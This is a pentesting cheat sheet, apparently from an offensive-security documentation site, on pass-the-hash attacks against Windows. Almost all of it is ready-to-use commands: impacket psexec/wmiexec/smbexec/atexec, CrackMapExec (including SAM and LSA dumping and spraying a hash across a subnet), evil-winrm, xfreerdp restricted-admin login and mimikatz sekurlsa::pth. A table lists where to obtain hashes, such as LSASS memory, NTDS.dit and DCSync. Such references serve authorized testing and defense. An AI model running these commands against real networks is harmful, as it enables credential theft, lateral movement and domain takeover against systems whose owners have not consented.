Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Use NTLM hash directly for authentication. No need to crack. Works with SMB, WinRM, RDP (restricted admin), WMI, etc.

Impacket

impacket-psexec DOMAIN/user@TARGET -hashes aad3b435b51404eeaad3b435b51404ee:NTLM_HASH
impacket-wmiexec DOMAIN/user@TARGET -hashes :NTLM_HASH
impacket-smbexec DOMAIN/user@TARGET -hashes :NTLM_HASH
impacket-atexec DOMAIN/user@TARGET -hashes :NTLM_HASH "whoami"

CrackMapExec

crackmapexec smb TARGET -u user -H NTLM_HASH
crackmapexec smb TARGET -u user -H NTLM_HASH -x "whoami"
crackmapexec smb TARGET -u user -H NTLM_HASH --sam          # Dump SAM
crackmapexec smb TARGET -u user -H NTLM_HASH --lsa          # Dump LSA
crackmapexec winrm TARGET -u user -H NTLM_HASH

Evil-WinRM

evil-winrm -i TARGET -u user -H NTLM_HASH

xfreerdp (RDP — Restricted Admin)

xfreerdp /v:TARGET /u:user /pth:NTLM_HASH
Requires Restricted Admin mode enabled on target.

Mimikatz (Windows)

sekurlsa::pth /user:administrator /domain:DOMAIN /ntlm:NTLM_HASH /run:cmd.exe

Spray Hash Across Subnet

crackmapexec smb 10.10.10.0/24 -u administrator -H NTLM_HASH

Get the Hash

SourceTool
SAM databasesecretsdump, reg save
LSASS memorymimikatz, procdump
NTDS.ditsecretsdump, ntdsutil
DCSyncsecretsdump -just-dc
Cached credsmimikatz lsadump::cache

Quick Reference

TaskCommand
PsExecimpacket-psexec DOM/user@TARGET -hashes :HASH
WinRMevil-winrm -i TARGET -u user -H HASH
CMEcrackmapexec smb TARGET -u user -H HASH
Mimikatzsekurlsa::pth /user:admin /ntlm:HASH
Spraycrackmapexec smb SUBNET -u admin -H HASH